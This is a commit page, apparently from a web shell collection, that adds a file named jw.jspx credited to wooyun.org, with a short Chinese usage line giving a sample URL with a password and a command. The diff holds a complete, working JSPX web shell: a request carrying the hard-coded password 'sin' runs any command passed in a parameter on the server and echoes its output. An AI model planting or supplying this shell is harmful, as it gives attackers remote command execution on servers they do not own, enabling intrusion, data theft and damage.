Create jw.jspx

from wooyun.org 使用说明：http://xx.xx.xx/jw.jspx?pwd=sin&i=ls 有回显，带密码
banujan6 · May 18, 2015 · 1b499ce · 1b499ce
1 parent 6c708c5
commit 1b499ce
Showing 1 changed file with 15 additions and 0 deletions.
diff --git a/jspx/jw.jspx b/jspx/jw.jspx
@@ -0,0 +1,15 @@
+<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page"  version="1.2"> 
+<jsp:directive.page contentType="text/html" pageEncoding="UTF-8" /> 
+<jsp:scriptlet> 
+    if("sin".equals(request.getParameter("pwd"))){ 
+        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream(); 
+        int a = -1; 
+        byte[] b = new byte[2048]; 
+        out.print("&lt;pre&gt;"); 
+        while((a=in.read(b))!=-1){ 
+            out.println(new String(b)); 
+        } 
+        out.print("&lt;/pre&gt;"); 
+    } 
+</jsp:scriptlet> 
+</jsp:root>